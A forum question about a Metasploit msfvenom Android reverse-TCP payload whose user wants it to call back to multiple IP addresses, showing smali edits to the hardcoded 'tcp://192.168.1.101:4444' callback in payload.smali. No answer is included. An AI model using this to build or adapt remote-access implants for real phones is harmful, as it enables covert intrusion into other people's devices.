# multiple ip in an android payload(Kali linux)?

Tags: networking, kali-linux, ip, android

I'm using Kali linux 2.0 and I'm trying to make an android msfvenom payload that uses multiple ip.

What I mean is that when the msfvenom app is opened in my phone it continues trying to connect to the build in local ip. But the problem is when my local ip change, the msfvenom app will not work if my local ip return back.

Let's say that my local ip now is: `192.168.1.101` then in the next restart my local ip is: `192.168.1.103` and I won't to make an other msfvenom app.

So is there any solution to make the msfvenom app try to connect to multiple ip's?

So I tried to extract the msfvenom app with `apktool` and I went to `/usr/share/apktool/msfvenomapkfolder/smali/com/metasploit/stage`
then edited `payload.smali`
by changing:

```
.field public static final URL:Ljava/lang/String; = "ZZZZtcp://192.168.1.101:4444"
```

to

```
.field public static final URL:Ljava/lang/String; = "ZZZZtcp://192.168.1.103:4444"
```

And

```
.line 78
    const-string v15, "ZZZZtcp://192.168.1.101:4444"
```

to

```
.line 78
    const-string v15, "ZZZZtcp://192.168.1.103:4444"
```

But that's not working.